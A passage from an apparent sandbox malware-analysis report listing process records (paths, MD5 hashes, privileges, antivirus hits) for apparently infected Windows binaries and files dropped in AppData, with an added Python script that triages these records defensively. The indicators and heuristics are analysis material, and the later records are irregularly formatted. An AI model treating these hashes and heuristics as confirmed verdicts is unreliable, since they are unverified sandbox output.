Commandline:C:\Windows\SysWow64\perfhost.exe
Imagebase:0x1000000
File size:1'150'464 bytes
MD5 hash:11D691ADAD67DBAC861DB2471CE9028B
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Has exited:false

Target ID:42
Start time:06:57:38
Start date:15/01/2025
Path:C:\Windows\System32\Locator.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\locator.exe
Imagebase:0x100000000
File size:1'140'224 bytes
MD5 hash:860030B06B83DAD907D4E0801AB228F9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Has exited:false

Target ID:43
Start time:06:57:39
Start date:15/01/2025
Path:C:\Windows\System32\snmptrap.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\snmptrap.exe
Imagebase:0x100000000
File size:1'144'320 bytes
MD5 hash:BD9A4418F0BB9873B642B4914A4BCFC8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:46
Start time:06:58:00
Start date:15/01/2025
Path:C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Imagebase:0x970000
File size:665'670'656 bytes
MD5 hash:46981F20592CA1EB36C2C21E396551EC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
Has exited:false

Target ID:47
Start time:06:57:50
Start date:15/01/2025
Path:C:\Users\user\AppData\Roaming\hVVSnrrP.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Imagebase:0x230000
File size:1'538'560 bytes
MD5 hash:AC9D898648D7B851BBCCB6F6028D45C6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:48
Start time:06:57:44
Start date:15/01/2025
Path:C:\Windows\System32\vds.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\vds.exe
Imagebase:0x100000000
File size:1'660'928 bytes
MD5 hash:39BE2351CC35C279474F5941C10A602A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false
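
The process records above carry the indicators an analyst actually pivots on: stock Windows binaries (perfhost.exe, Locator.exe) that nevertheless trip antivirus, executables launched from the user's AppData\Roaming tree, a 665 MB image, and one dropped file started more than once. The script below is an added example and is not part of the Joe Sandbox report or its tooling. It parses the plain-text "Key:value" listing in the form shown above and applies those checks. The embedded input is an excerpt copied from the records above, trimmed to the fields the checks use; the heuristics themselves (AppData as attacker-writable, 100 MiB as an oversize threshold, AV hit on a C:\Windows binary as a possible infected file) are this example's assumptions, not report fields.

```python
"""Triage the 'Target ID' process records of a Joe Sandbox report.

Added example, not Joe Sandbox code. SAMPLE_RECORDS is an excerpt copied from
the process listing above, trimmed to the fields used here; the heuristics and
the 100 MiB size threshold are this example's assumptions, not report fields.
"""
import re
from dataclasses import dataclass, field

SAMPLE_RECORDS = r"""
Target ID:41
Path:C:\Windows\SysWOW64\perfhost.exe
File size:1'150'464 bytes
MD5 hash:11D691ADAD67DBAC861DB2471CE9028B
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML

Target ID:46
Path:C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
File size:665'670'656 bytes
MD5 hash:46981F20592CA1EB36C2C21E396551EC
Antivirus matches:
• Detection: 100%, Avira

Target ID:47
Path:C:\Users\user\AppData\Roaming\hVVSnrrP.exe
File size:1'538'560 bytes
MD5 hash:AC9D898648D7B851BBCCB6F6028D45C6

Target ID:50
Path:C:\Users\user\AppData\Roaming\hVVSnrrP.exe
File size:1'538'560 bytes
MD5 hash:AC9D898648D7B851BBCCB6F6028D45C6
"""

# Assumptions: an image under a user's AppData tree is attacker-writable, and a
# PE above 100 MiB is padded past the upload limit of many scanners.
USER_PROFILE_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\", re.I)
SYSTEM_DIR_RE = re.compile(r"^[a-z]:\\windows\\", re.I)
LARGE_IMAGE_BYTES = 100 * 1024 * 1024


@dataclass
class ProcessRecord:
    target_id: int
    path: str
    md5: str
    size_bytes: int
    av_matches: list = field(default_factory=list)


def parse_records(text: str) -> list:
    """Parse blank-line-separated blocks of 'Key:value' lines. Only the first
    colon splits key from value ('Start time:06:57:38' and 'Path:C:\\...' both
    survive); bullet lines belong to the preceding 'Antivirus matches:' key."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields, av = {}, []
        for line in (ln.strip() for ln in block.splitlines()):
            if line.startswith("•"):
                av.append(line.lstrip("• ").strip())
            elif ":" in line:
                key, _, value = line.partition(":")
                fields[key.strip()] = value.strip()
        if "Target ID" in fields:
            # The report groups digits with apostrophes: 665'670'656 bytes.
            size = int(re.sub(r"\D", "", fields.get("File size", "")) or 0)
            records.append(ProcessRecord(int(fields["Target ID"]), fields.get("Path", ""),
                                         fields.get("MD5 hash", "").upper(), size, av))
    return records


def triage(records) -> dict:
    """Map Target ID -> indicator strings for the records worth a closer look."""
    findings = {}
    for r in records:
        flags = []
        if USER_PROFILE_RE.match(r.path):
            flags.append("runs from user-writable AppData")
        if SYSTEM_DIR_RE.match(r.path) and r.av_matches:
            # A stock Windows binary should not trip AV; hash it against a
            # known-good copy before trusting anything else on the host.
            flags.append("system binary with antivirus match (possible infected file)")
        if r.size_bytes >= LARGE_IMAGE_BYTES:
            flags.append(f"oversized image ({r.size_bytes // (1024 * 1024)} MiB)")
        if flags:
            findings[r.target_id] = flags
    return findings


def group_by_md5(records) -> dict:
    """Map MD5 -> Target IDs so repeated launches of one image stand out."""
    groups = {}
    for r in records:
        groups.setdefault(r.md5, []).append(r.target_id)
    return groups


if __name__ == "__main__":
    for tid, flags in sorted(triage(parse_records(SAMPLE_RECORDS)).items()):
        print(f"Target {tid}: {'; '.join(flags)}")
```

On the excerpt this flags Target 41 as a system binary with an AV match, Target 46 as both AppData-resident and oversized, Targets 47 and 50 as AppData-resident, and shows 47 and 50 as two launches of the same MD5. For the flagged System32/SysWOW64 images the report's MD5 alone is not a verdict: compare it with the hash of the same binary from a clean installation of the same Windows build, since a mismatch there is what confirms the on-disk file was modified.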

Target ID:50
Start time:06:58:04
Start date:15/01/2025
Path:C:\Users\user\AppData\Roaming\hVVSnrrP.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Imagebase:0x230000
File size:1'538'560 bytes
MD5 hash:AC9D898648D7B851BBCCB6F6028D45C6
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:51
                                                                                                                                                                                                                                                                        Start time:06:57:56
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbengine.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\wbengine.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x100000000
                                                                                                                                                                                                                                                                        File size:2'083'328 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FCD24DD63126C9B5BC420BF92FA39456
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:53
                                                                                                                                                                                                                                                                        Start time:06:58:13
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x230000
                                                                                                                                                                                                                                                                        File size:1'538'560 bytes
                                                                                                                                                                                                                                                                        MD5 hash:AC9D898648D7B851BBCCB6F6028D45C6
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        No disassembly